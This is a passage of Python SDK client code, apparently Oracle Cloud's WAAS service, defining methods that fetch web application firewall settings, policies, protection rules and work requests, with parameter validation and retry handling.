    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="Certificate")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="Certificate")
def get_custom_protection_rule(self, custom_protection_rule_id, **kwargs):
    """
    Gets the details of a custom protection rule.

    :param str custom_protection_rule_id: (required)
        The `OCID`__ of the custom protection rule. This number is generated when
        the custom protection rule is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/customProtectionRules/{customProtectionRuleId}"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_custom_protection_rule got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "customProtectionRuleId": custom_protection_rule_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="CustomProtectionRule")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="CustomProtectionRule")
def get_device_fingerprint_challenge(self, waas_policy_id, **kwargs):
    """
    Gets the device fingerprint challenge settings in the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.DeviceFingerprintChallenge`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/wafConfig/deviceFingerprintChallenge"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_device_fingerprint_challenge got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="DeviceFingerprintChallenge")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="DeviceFingerprintChallenge")
def get_human_interaction_challenge(self, waas_policy_id, **kwargs):
    """
    Gets the human interaction challenge settings in the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.HumanInteractionChallenge`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/wafConfig/humanInteractionChallenge"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_human_interaction_challenge got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="HumanInteractionChallenge")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="HumanInteractionChallenge")
def get_js_challenge(self, waas_policy_id, **kwargs):
    """
    Gets the JavaScript challenge settings in the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.JsChallenge`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/wafConfig/jsChallenge"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_js_challenge got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="JsChallenge")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="JsChallenge")
def get_policy_config(self, waas_policy_id, **kwargs):
    """
    Gets the configuration of a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.PolicyConfig`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/policyConfig"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_policy_config got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="PolicyConfig")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="PolicyConfig")
def get_protection_rule(self, waas_policy_id, protection_rule_key, **kwargs):
    """
    Gets the details of a protection rule in the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str protection_rule_key: (required)
        The protection rule key.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.ProtectionRule`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules/{protectionRuleKey}"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_protection_rule got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id,
        "protectionRuleKey": protection_rule_key
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="ProtectionRule")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="ProtectionRule")
def get_protection_settings(self, waas_policy_id, **kwargs):
    """
    Gets the protection settings in the Web Application Firewall configuration
    for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.ProtectionSettings`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}/wafConfig/protectionSettings"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_protection_settings got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="ProtectionSettings")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="ProtectionSettings")
def get_waas_policy(self, waas_policy_id, **kwargs):
    """
    Gets the details of a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; include it when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level strategy.
        Use one of the strategies in :py:mod:`~oci.retry`; this operation does not
        retry by default. Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable
        retries explicitly.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings (disallowed
        by default).

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WaasPolicy`
    :rtype: :class:`~oci.response.Response`
    """
    endpoint = "/waasPolicies/{waasPolicyId}"
    http_method = "GET"

    # Reject any keyword arguments this operation does not understand.
    recognized = frozenset(("allow_control_chars", "retry_strategy", "opc_request_id"))
    unknown = [_k for _k in six.iterkeys(kwargs) if _k not in recognized]
    if unknown:
        raise ValueError(
            "get_waas_policy got unknown kwargs: {!r}".format(unknown))

    path_args = {
        "waasPolicyId": waas_policy_id
    }
    path_args = {name: val for (name, val) in six.iteritems(path_args) if val is not missing}
    # Every path parameter must be a concrete, non-blank value.
    for (name, val) in six.iteritems(path_args):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    headers = {name: val for (name, val) in six.iteritems(headers) if val is not missing and val is not None}

    chosen_retry = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not chosen_retry:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=endpoint,
            method=http_method,
            path_params=path_args,
            header_params=headers,
            response_type="WaasPolicy")

    if not isinstance(chosen_retry, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        chosen_retry.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return chosen_retry.make_retrying_call(
        self.base_client.call_api,
        resource_path=endpoint,
        method=http_method,
        path_params=path_args,
        header_params=headers,
        response_type="WaasPolicy")
def get_waf_address_rate_limiting(self, waas_policy_id, **kwargs):
    """
    Gets the address rate limiting settings of the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressRateLimiting`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_waf_address_rate_limiting.py.html>`__ to see an example of how to use get_waf_address_rate_limiting API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "get_waf_address_rate_limiting got unknown kwargs: {!r}".format(unknown))

    # Path templating values; blank or None identifiers are invalid.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/waasPolicies/{waasPolicyId}/wafConfig/addressRateLimiting",
        method="GET",
        path_params=path_params,
        header_params=header_params,
        response_type="AddressRateLimiting")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_waf_config(self, waas_policy_id, **kwargs):
    """
    Gets the Web Application Firewall configuration details for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WafConfig`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_waf_config.py.html>`__ to see an example of how to use get_waf_config API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "get_waf_config got unknown kwargs: {!r}".format(unknown))

    # Path templating values; blank or None identifiers are invalid.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/waasPolicies/{waasPolicyId}/wafConfig",
        method="GET",
        path_params=path_params,
        header_params=header_params,
        response_type="WafConfig")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_work_request(self, work_request_id, **kwargs):
    """
    Gets the details of a specified work request.

    :param str work_request_id: (required)
        The `OCID`__ of the work request. This number is generated when the
        work request is created.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WorkRequest`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_work_request.py.html>`__ to see an example of how to use get_work_request API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "get_work_request got unknown kwargs: {!r}".format(unknown))

    # Path templating values; blank or None identifiers are invalid.
    path_params = {"workRequestId": work_request_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/workRequests/{workRequestId}",
        method="GET",
        path_params=path_params,
        header_params=header_params,
        response_type="WorkRequest")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_access_rules(self, waas_policy_id, **kwargs):
    """
    Gets the currently configured access rules for the Web Application
    Firewall configuration of a specified WAAS policy.

    The order of the access rules is important: they are checked in the
    order specified and the first matching rule is used.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param int limit: (optional)
        Maximum number of items per paginated call. Defaults to `10` when
        unspecified.

    :param str page: (optional)
        The `opc-next-page` response header value from the previous
        paginated call.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.AccessRule`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_access_rules.py.html>`__ to see an example of how to use list_access_rules API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "list_access_rules got unknown kwargs: {!r}".format(unknown))

